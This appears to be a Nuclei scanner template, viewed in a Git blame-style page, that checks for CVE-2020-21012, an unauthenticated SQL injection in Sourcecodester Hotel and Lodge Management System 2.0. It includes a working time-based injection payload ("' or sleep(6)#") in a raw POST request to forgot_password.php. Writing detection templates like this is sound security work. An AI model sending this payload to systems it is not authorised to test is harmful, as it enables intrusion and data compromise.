nuclei-templates/cves/2020/CVE-2020-21012.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2022-09-30 14:26:08 +00:00
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-09-30 14:26:08 +00:00
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
2022-11-15 11:15:00 +00:00
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
2022-09-30 14:26:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-09-30 14:26:08 +00:00
cve-id: CVE-2020-21012
cwe-id: CWE-89
2022-11-15 11:15:00 +00:00
metadata:
verified: "true"
2022-11-16 08:36:26 +00:00
tags: cve,cve2020,hotel,sqli,unauth
2022-09-30 14:26:08 +00:00
requests:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-11-15 11:15:00 +00:00
btn_forgot=1&email=1%27%20or%20sleep(6)%23
2022-09-30 14:26:08 +00:00
matchers:
- type: dsl
dsl:
2022-11-15 11:15:00 +00:00
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# Enhanced by md on 2022/12/08